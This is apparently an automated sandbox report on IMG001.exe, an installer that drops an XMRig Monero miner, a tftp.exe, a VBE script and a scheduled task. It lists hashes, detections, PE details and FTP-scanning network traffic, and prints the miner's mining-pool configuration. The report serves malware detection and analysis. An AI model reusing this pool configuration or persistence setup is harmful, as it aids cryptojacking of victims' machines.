SHA-256:	D0326F0DDCE4C00F93682E3A6F55A3125F6387E959E9ED6C5E5584E78E737078
SHA-512:	9DE3390197A02965FEED6ACDC77A292C0EF160E466FBFC9500FA7DE17B0225A935127DA71029CB8006BC7A5F4B5457319362B7A7CAF4C0BF92174D139ED52AB5
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Roaming\NsMiner\NsCpuCNMiner64.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 89%, Browse Antivirus: ReversingLabs, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3...R...R...R..I..R..&....R.......R..&...QR..&...$R...R~.7R..+%..R.......R.......R.......R..Rich.R..........................PE..d...~..S.........."......t...&......."2........@..............................:...........`...z.......................................9.P...0.2.......:.\|.......t.............:.......:.8...................8M:.@... .:.p.............9..............................text...yr.......................... ..`.rdata...J..........................@..@.data...............................@....pdata..t...........................@..@.tls.........p......................@....vmp0....W..........................`....vmp1...8.....".....................`....reloc........:.....................@..@.rsrc...\|.....:.....................@..@........................................................................................................................

C:\Users\user\AppData\Roaming\NsMiner\pools.txt Download File
Process:	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	500
Entropy (8bit):	4.6096355862801355
Encrypted:	false
SSDEEP:	12:3cuSBcuSGcdVcdVIcWVn8cM0IcrMXBc9RIceGeMdcrMXlcibvcbZucA:3cuUcuvcPc4cFcMlcrmcMceGXdcrKcu1
MD5:	5137876455F2FD0C032CEED6FDBE49CB
SHA1:	A33210E43247B1F04F51A341E5BE79F769ACC941
SHA-256:	8689FD11C63754AEABB202D7E1DB3E5FE896F4E4E3597D4BFED58950F3110BB9
SHA-512:	3DEEF3848E340A0A631A8969EBABFDE22A9A5C69A0C2EC2AD7E2E745800A593591F173C5611B573BE7EA87261459D97680E85B13DA73E39A8AABDFBFC7609761
Malicious:	true
Yara Hits:	Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: C:\Users\user\AppData\Roaming\NsMiner\pools.txt, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Roaming\NsMiner\pools.txt, Author: Joe Security
Preview:	stratum+tcp://mine.moneropool.com:8080..stratum+tcp://mine.moneropool.com:3336..stratum+tcp://xmr.hashinvest.net:443..stratum+tcp://xmr.hashinvest.net:5555..stratum+tcp://monero.crypto-pool.fr:3333..stratum+tcp://monerohash.com:5555..stratum+tcp://mine.xmr.unipool.pro:3333..stratum+tcp://xmr.prohash.net:5555..stratum+tcp://xmr.miner.center:2777..stratum+tcp://mine.xmr.unipool.pro:80..stratum+tcp://pool.minexmr.com:7777..stratum+tcp://cryptonotepool.org.uk:7777..stratum+tcp://mro.poolto.be:3000..

C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\NsMiner\IMG001.exe Download File
Process:	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	3551765
Entropy (8bit):	7.995318027560144
Encrypted:	true
SSDEEP:	98304:MKVPnq1y5tQOM33ZNqCtBixHl54Oyjes1boR:dVPq1yLanrqTr43eS+
MD5:	62E3FDCEC6EED38E01571716A25D4547
SHA1:	01EF02B0ABCA86168EE0A61BF6CC155319B22A66
SHA-256:	C096A0169583F4088A3FCFA26AC5AD6C91FEE5FA247E0543A688F2F0C429091D
SHA-512:	C51826AA5DE77D138B9D2B596002B308881FB6B9825FF54DD019CCA1DAF68307BEBF97C08767B72BBB1EC4FBED62E0D12291473B3C19629A5012B34A06D83E9E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 55%, Browse Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<...x..x..x.....z..x........i..,.t.....y..Richx..................PE..L......K.................\....;.. ...0.......p....@..........................`A..............................................s.......`@..............................................................................p...............................text...,Z.......\.................. ..`.rdata.......p.......`..............@..@.data.....;..........r..............@....ndata.......`<..........................rsrc........`@......v..............@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\NsMiner\IMG001.exe:Zone.Identifier Download File
Process:	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\Tasks\UAC.job Download File
Process:	C:\Windows\SysWOW64\schtasks.exe
File Type:	data
Category:	dropped
Size (bytes):	364
Entropy (8bit):	3.4137530308227624
Encrypted:	false
SSDEEP:	6:x2Asn2XkelN23Ti1UEZglJPZdWvYtKl3Ti1UEZglJPZdjcF/JTMy0lTN1:x2ZnUFlN23qMJri3qMJrwFhwVTn
MD5:	39126E38C43B1E75EA0DE7CC20618E2D
SHA1:	4F909516339E45CDBD0A38D813A475B76236D671
SHA-256:	E62C0E7DA8D179545B797CCFED10FC0EE5CBD2E6516875C62C602A6FE12B5617
SHA-512:	10A0B4FCCC637B96AA0FA36ED159FC534B804C1223FCB452ACEB4C83BC5DB7131E2E8073F29F3ACB41972209F0F67E1BFD60166FFB5BD9413325B668CCBDE3B2
Malicious:	false
Preview:	.....T.....N......WF.:.....<... .....s...............................2.C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.N.s.M.i.n.e.r.\.I.M.G.0.0.1...e.x.e.....'.C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.N.s.M.i.n.e.r.....D.E.S.K.T.O.P.-.7.1.6.T.7.7.1.\.h.a.r.d.z...................0...............................................

C:\Windows\Temp\info.zip Download File
Process:	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	1068
Entropy (8bit):	7.690275133404956
Encrypted:	false
SSDEEP:	24:91mVy6UwvwrBg4o+xu9f2vyHwKmKuuuD5hioildx8R:91mOOwrBg8gUydU
MD5:	8604E0F263922501F749CFCA447B041A
SHA1:	85C712BDEACEB78E2785E1F63811B0C4A50F952D
SHA-256:	52EC3BA075A507E62BB6E3272FB13B30A8DDC0F62C4EA194311D558B338EB5ED
SHA-512:	496D7A1B8B55D28387DAD3F1C43E164BB567259C4CAC21DD632CCD450DFBF28D431330C27EA72A5A8034979C325D19FF3FD8A3F7FC12B1122F67EF595630D5B2
Malicious:	false
Preview:	PK.........wGm:.....".......info.vbeMT.H.....z[......J.R.:..s.dQ..@m.?...J6.3...l..3=.....s5"...w<....P..DE?.u@:.F......H.}AuI(.p..4z....JN.......H.E[....\...)...G`...7.y.L]R'"...D..r...-.e...[.5..\.....P....Kv.3....F.$.u..(.....Tm@.K...].A...}.-dn........V.4.....[.m....E....1\....B..}...u8....P.{..~.K...../)..`e.._x.3.>.........x.4.w...O....NTL..n.}.=3).........V..}X.2.......c..&.\|...e...^..q..V.......z..8.o........kd......A.!..ux...j-....@5.-...kF...y.....{P..1..T...~.h2....5a..l.y.`.S.\|;.X.v..........5e+.F....-.^Z8.].......H..1yF.".......?Z/..V..%-.{'B.=+3.8.+G...i..>..8bM....O #..m.Wu....2..:...).Y_..O..s..h.t.y:...h_U.4(\.v...;..%.#>v....2.._....C.)...&.9.."4.G..U..+E.....-.....f2..).,t`.Lm_I.F.t.;..84.2s..Vp..'....l....-dn....k......\.vQ.{d.C.../..zgVt.]..).......4.0...z0.w.....).H.w.d.6.v..^o..zg..>_.Jr. .7.Q.x.6q.D,1.4$..Y.'.<Vi..#..l...^.r..z.<Mr...-=.`..KV.]......2.r.F.n..P..Z..*7{ -].[..6...z.4.r........NIo..1.".?..PK......

C:\Windows\Temp\tftp.exe Download File
Process:	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	93184
Entropy (8bit):	6.085590187107592
Encrypted:	false
SSDEEP:	1536:kvPW2y3HnJ8txqqLbR6wHaoev4IWu3GI7UnS:Uy3J8iqnRmUnS
MD5:	C80D5BBD7F47398B9530A7968FF07FE3
SHA1:	8B2D7C3F299A9FEEACC87F3AB2CAAE09C133BB06
SHA-256:	1D9E2F10196BA34F3B7C5CC6E24C306FB401F8C63EA122FBC6D2C448226C576F
SHA-512:	9D43D52DF684EC8EC5CED577C07AF79B3728C5CB76FE0951F8B1C5727CE27B214C6628A36A595A5038AD97DC99F13AA72367124F4E521407D163620016E2A592
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....BlV....................h...L...........@....@........................................... ......................................................................................................................................................text....).........................`.P`.data...D....@......................@.`..rdata...%...P...&...2..............@.`@.eh_fram.............X..............@.0@.bss....LK............................`..idata...............\..............@.0..CRT.................h..............@.0..tls.... ............j..............@.0.................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.995318027560144
TrID:	Win32 Executable (generic) a (10002005/4) 92.16% NSIS - Nullsoft Scriptable Install System (846627/2) 7.80% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	IMG001.exe
File size:	3551765
MD5:	62e3fdcec6eed38e01571716a25d4547
SHA1:	01ef02b0abca86168ee0a61bf6cc155319b22a66
SHA256:	c096a0169583f4088a3fcfa26ac5ad6c91fee5fa247e0543a688f2f0c429091d
SHA512:	c51826aa5de77d138b9d2b596002b308881fb6b9825ff54dd019cca1daf68307bebf97c08767b72bbb1ec4fbed62e0d12291473b3c19629a5012b34a06d83e9e
SSDEEP:	98304:MKVPnq1y5tQOM33ZNqCtBixHl54Oyjes1boR:dVPq1yLanrqTr43eS+
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<...x...x...x.......z...x...........i...,...t.......y...Richx...................PE..L......K.................\....;.. ...0.....

File Icon


Icon Hash:	7e727e7e6a6266bc

Static PE Info

General
Entrypoint:	0x4030de
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x4B1AE406 [Sat Dec 5 22:51:50 2009 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	7fa974366048f9c551ef45714595665e

Entrypoint Preview

Instruction
sub esp, 00000180h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409160h
xor esi, esi
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407030h]
push 00008001h
call dword ptr [004070B0h]
push ebx
call dword ptr [0040727Ch]
push 00000008h
mov dword ptr [007C5758h], eax
call 00007FD8F081DCF6h
mov dword ptr [007C56A4h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 00000160h
push eax
push ebx
push 007A8468h
call dword ptr [00407158h]
push 00409154h
push 007C16A0h
call 00007FD8F081D9A9h
call dword ptr [004070ACh]
mov edi, 007EE000h
push eax
push edi
call 00007FD8F081D997h
push ebx
call dword ptr [0040710Ch]
cmp byte ptr [007EE000h], 00000022h
mov dword ptr [007C56A0h], eax
mov eax, edi
jne 00007FD8F081B10Ch
mov byte ptr [esp+14h], 00000022h
mov eax, 007EE001h
push dword ptr [esp+14h]
push eax
call 00007FD8F081D48Ah
push eax
call dword ptr [0040721Ch]
mov dword ptr [esp+1Ch], eax
jmp 00007FD8F081B165h
cmp cl, 00000020h
jne 00007FD8F081B108h
inc eax
cmp byte ptr [eax], 00000020h
je 00007FD8F081B0FCh
cmp byte ptr [eax], 00000022h
mov byte ptr [eax+eax+00h], 00000000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x73a4	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x406000	0xfbd8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x28c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5a2c	0x5c00	False	0.672724184783	data	6.44711303359	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1190	0x1200	False	0.4453125	data	5.17976375781	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x3bc798	0x400	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x3c6000	0x40000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x406000	0xfbd8	0xfc00	False	0.776181175595	data	7.02457148864	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x406340	0x90c1	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x40f408	0x25a8	data	English	United States
RT_ICON	0x4119b0	0x10a8	data	English	United States
RT_ICON	0x412a58	0xea8	data	English	United States
RT_ICON	0x413900	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 15593722, next used block 15725052	English	United States
RT_ICON	0x4141a8	0x668	data	English	United States
RT_ICON	0x414810	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x414d78	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x4151e0	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 16287880, next used block 0	English	United States
RT_ICON	0x4154c8	0x128	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x4155f0	0x100	data	English	United States
RT_DIALOG	0x4156f0	0x11c	data	English	United States
RT_DIALOG	0x415810	0x60	data	English	United States
RT_GROUP_ICON	0x415870	0x92	data	English	United States
RT_MANIFEST	0x415908	0x2cc	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
USER32.dll	EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll	RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source IP	Dest IP
04/14/21-04:49:39.652288	ICMP	399	ICMP Destination Unreachable Host Unreachable	186.211.180.58	192.168.2.3
04/14/21-04:49:39.682723	ICMP	401	ICMP Destination Unreachable Network Unreachable	194.81.6.182	192.168.2.3
04/14/21-04:49:39.866067	ICMP	485	ICMP Destination Unreachable Communication Administratively Prohibited	91.55.235.46	192.168.2.3
04/14/21-04:49:42.676617	ICMP	401	ICMP Destination Unreachable Network Unreachable	194.81.6.182	192.168.2.3
04/14/21-04:49:42.682425	ICMP	399	ICMP Destination Unreachable Host Unreachable	186.211.180.58	192.168.2.3
04/14/21-04:49:42.999399	ICMP	485	ICMP Destination Unreachable Communication Administratively Prohibited	91.55.235.46	192.168.2.3
04/14/21-04:50:04.503216	ICMP	485	ICMP Destination Unreachable Communication Administratively Prohibited	79.241.196.51	192.168.2.3
04/14/21-04:50:29.298117	ICMP	449	ICMP Time-To-Live Exceeded in Transit	66.160.172.98	192.168.2.3
04/14/21-04:50:32.311814	ICMP	449	ICMP Time-To-Live Exceeded in Transit	66.160.172.98	192.168.2.3
04/14/21-04:50:35.875638	ICMP	401	ICMP Destination Unreachable Network Unreachable	81.228.86.231	192.168.2.3
04/14/21-04:51:06.161490	ICMP	449	ICMP Time-To-Live Exceeded in Transit	168.83.1.40	192.168.2.3
04/14/21-04:51:09.413970	ICMP	399	ICMP Destination Unreachable Host Unreachable	64.59.80.53	192.168.2.3
04/14/21-04:51:25.115329	ICMP	399	ICMP Destination Unreachable Host Unreachable	199.116.85.26	192.168.2.3
04/14/21-04:51:36.132942	ICMP	401	ICMP Destination Unreachable Network Unreachable	149.11.89.129	192.168.2.3
04/14/21-04:51:36.211255	ICMP	449	ICMP Time-To-Live Exceeded in Transit	132.180.252.244	192.168.2.3
04/14/21-04:51:37.538751	ICMP	399	ICMP Destination Unreachable Host Unreachable	78.47.230.154	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 14, 2021 04:49:39.239901066 CEST	49726	21	192.168.2.3	171.230.248.102
Apr 14, 2021 04:49:39.241473913 CEST	49727	21	192.168.2.3	171.177.72.44
Apr 14, 2021 04:49:39.242783070 CEST	49728	21	192.168.2.3	85.160.162.223
Apr 14, 2021 04:49:39.244220018 CEST	49729	21	192.168.2.3	19.241.222.80
Apr 14, 2021 04:49:39.247400045 CEST	49730	21	192.168.2.3	90.125.237.45
Apr 14, 2021 04:49:39.249818087 CEST	49731	21	192.168.2.3	219.170.142.236
Apr 14, 2021 04:49:39.251156092 CEST	49732	21	192.168.2.3	121.206.203.45
Apr 14, 2021 04:49:39.258091927 CEST	49735	21	192.168.2.3	12.106.190.66
Apr 14, 2021 04:49:39.258177042 CEST	49734	21	192.168.2.3	73.1.14.7
Apr 14, 2021 04:49:39.261173964 CEST	49736	21	192.168.2.3	198.61.197.74
Apr 14, 2021 04:49:39.262851000 CEST	49737	21	192.168.2.3	76.237.177.216
Apr 14, 2021 04:49:39.263333082 CEST	49738	21	192.168.2.3	218.96.42.181
Apr 14, 2021 04:49:39.263577938 CEST	49739	21	192.168.2.3	130.225.23.51
Apr 14, 2021 04:49:39.270736933 CEST	49740	21	192.168.2.3	67.58.234.31
Apr 14, 2021 04:49:39.290108919 CEST	49741	21	192.168.2.3	131.75.79.149
Apr 14, 2021 04:49:39.304280996 CEST	49742	21	192.168.2.3	46.76.75.38
Apr 14, 2021 04:49:39.318662882 CEST	49743	21	192.168.2.3	155.130.203.173
Apr 14, 2021 04:49:39.382071018 CEST	49744	21	192.168.2.3	220.84.242.201
Apr 14, 2021 04:49:39.384052992 CEST	49745	21	192.168.2.3	45.5.247.37
Apr 14, 2021 04:49:39.386131048 CEST	49746	21	192.168.2.3	86.62.15.78
Apr 14, 2021 04:49:39.432068110 CEST	49747	21	192.168.2.3	171.166.62.66
Apr 14, 2021 04:49:39.487371922 CEST	49749	21	192.168.2.3	179.128.98.73
Apr 14, 2021 04:49:39.511915922 CEST	49750	21	192.168.2.3	185.29.165.99
Apr 14, 2021 04:49:39.513936996 CEST	49751	21	192.168.2.3	104.104.124.171
Apr 14, 2021 04:49:39.541724920 CEST	49753	21	192.168.2.3	3.108.243.58
Apr 14, 2021 04:49:39.548167944 CEST	49755	21	192.168.2.3	34.242.168.15
Apr 14, 2021 04:49:39.549284935 CEST	49756	21	192.168.2.3	109.254.18.193
Apr 14, 2021 04:49:39.563218117 CEST	49757	21	192.168.2.3	89.239.143.118
Apr 14, 2021 04:49:39.575330973 CEST	49758	21	192.168.2.3	41.35.35.143
Apr 14, 2021 04:49:39.576827049 CEST	49760	21	192.168.2.3	116.43.105.72
Apr 14, 2021 04:49:39.591145039 CEST	49761	21	192.168.2.3	130.142.102.100
Apr 14, 2021 04:49:39.624027014 CEST	49762	21	192.168.2.3	157.228.18.187
Apr 14, 2021 04:49:39.626085997 CEST	49763	21	192.168.2.3	210.220.207.9
Apr 14, 2021 04:49:39.637988091 CEST	49764	21	192.168.2.3	44.72.12.182
Apr 14, 2021 04:49:39.661067009 CEST	49765	21	192.168.2.3	99.236.23.224
Apr 14, 2021 04:49:39.669504881 CEST	49766	21	192.168.2.3	64.116.62.52
Apr 14, 2021 04:49:39.687511921 CEST	49767	21	192.168.2.3	171.117.176.171
Apr 14, 2021 04:49:39.701821089 CEST	49768	21	192.168.2.3	216.28.55.232
Apr 14, 2021 04:49:39.755717993 CEST	49769	21	192.168.2.3	41.159.74.41
Apr 14, 2021 04:49:39.764801979 CEST	49770	21	192.168.2.3	40.52.92.245
Apr 14, 2021 04:49:39.794466019 CEST	49771	21	192.168.2.3	144.46.165.116
Apr 14, 2021 04:49:39.812243938 CEST	49772	21	192.168.2.3	91.55.235.46
Apr 14, 2021 04:49:39.851630926 CEST	49774	21	192.168.2.3	212.70.158.89
Apr 14, 2021 04:49:39.856805086 CEST	49776	21	192.168.2.3	147.14.213.133
Apr 14, 2021 04:49:39.875761986 CEST	49777	21	192.168.2.3	90.242.155.36
Apr 14, 2021 04:49:39.889189959 CEST	49778	21	192.168.2.3	104.86.148.28
Apr 14, 2021 04:49:39.890032053 CEST	49779	21	192.168.2.3	153.176.174.168
Apr 14, 2021 04:49:39.913188934 CEST	49780	21	192.168.2.3	25.183.69.138
Apr 14, 2021 04:49:39.917030096 CEST	49781	21	192.168.2.3	128.166.71.75
Apr 14, 2021 04:49:39.924427032 CEST	21	49774	212.70.158.89	192.168.2.3
Apr 14, 2021 04:49:39.943406105 CEST	49783	21	192.168.2.3	129.116.232.201
Apr 14, 2021 04:49:39.950880051 CEST	49784	21	192.168.2.3	24.49.188.7
Apr 14, 2021 04:49:39.968770027 CEST	49785	21	192.168.2.3	105.179.204.191
Apr 14, 2021 04:49:40.007951975 CEST	49786	21	192.168.2.3	159.250.55.26
Apr 14, 2021 04:49:40.015978098 CEST	49787	21	192.168.2.3	208.96.174.244
Apr 14, 2021 04:49:40.017965078 CEST	49788	21	192.168.2.3	207.130.230.190
Apr 14, 2021 04:49:40.043847084 CEST	49789	21	192.168.2.3	41.203.78.215
Apr 14, 2021 04:49:40.060322046 CEST	49790	21	192.168.2.3	122.26.216.107
Apr 14, 2021 04:49:40.064811945 CEST	49791	21	192.168.2.3	169.106.68.226
Apr 14, 2021 04:49:40.074224949 CEST	49792	21	192.168.2.3	65.254.158.12
Apr 14, 2021 04:49:40.140804052 CEST	49795	21	192.168.2.3	121.60.39.136
Apr 14, 2021 04:49:40.173223972 CEST	49796	21	192.168.2.3	112.134.97.100
Apr 14, 2021 04:49:40.199919939 CEST	49798	21	192.168.2.3	41.23.111.248
Apr 14, 2021 04:49:40.216867924 CEST	49799	21	192.168.2.3	89.144.231.130
Apr 14, 2021 04:49:40.231967926 CEST	49800	21	192.168.2.3	117.44.26.168
Apr 14, 2021 04:49:40.263456106 CEST	49802	21	192.168.2.3	144.116.50.234
Apr 14, 2021 04:49:40.266051054 CEST	49803	21	192.168.2.3	17.22.172.54
Apr 14, 2021 04:49:40.276096106 CEST	49804	21	192.168.2.3	171.49.33.151
Apr 14, 2021 04:49:40.295634985 CEST	49805	21	192.168.2.3	55.142.1.120
Apr 14, 2021 04:49:40.312971115 CEST	49806	21	192.168.2.3	103.246.251.106
Apr 14, 2021 04:49:40.332020998 CEST	49807	21	192.168.2.3	82.231.211.245
Apr 14, 2021 04:49:40.343110085 CEST	49808	21	192.168.2.3	103.247.141.163
Apr 14, 2021 04:49:40.345689058 CEST	49809	21	192.168.2.3	96.72.172.148
Apr 14, 2021 04:49:40.375154018 CEST	49810	21	192.168.2.3	219.184.234.178
Apr 14, 2021 04:49:40.401179075 CEST	49812	21	192.168.2.3	150.218.53.109
Apr 14, 2021 04:49:40.434319019 CEST	49813	21	192.168.2.3	104.73.134.124
Apr 14, 2021 04:49:40.448084116 CEST	49814	21	192.168.2.3	149.207.134.197
Apr 14, 2021 04:49:40.495403051 CEST	49817	21	192.168.2.3	33.192.134.169
Apr 14, 2021 04:49:40.517440081 CEST	49818	21	192.168.2.3	78.3.123.203
Apr 14, 2021 04:49:40.538708925 CEST	49819	21	192.168.2.3	153.14.101.251
Apr 14, 2021 04:49:40.542505980 CEST	49820	21	192.168.2.3	166.238.30.180
Apr 14, 2021 04:49:40.600622892 CEST	49822	21	192.168.2.3	194.72.18.27
Apr 14, 2021 04:49:40.609318018 CEST	49823	21	192.168.2.3	80.72.208.69
Apr 14, 2021 04:49:40.617367983 CEST	49774	21	192.168.2.3	212.70.158.89
Apr 14, 2021 04:49:40.633330107 CEST	49824	21	192.168.2.3	125.233.60.227
Apr 14, 2021 04:49:40.654829979 CEST	49825	21	192.168.2.3	104.123.51.43
Apr 14, 2021 04:49:40.690232038 CEST	21	49774	212.70.158.89	192.168.2.3
Apr 14, 2021 04:49:41.211240053 CEST	49774	21	192.168.2.3	212.70.158.89
Apr 14, 2021 04:49:41.283989906 CEST	21	49774	212.70.158.89	192.168.2.3
Apr 14, 2021 04:49:42.304995060 CEST	49737	21	192.168.2.3	76.237.177.216
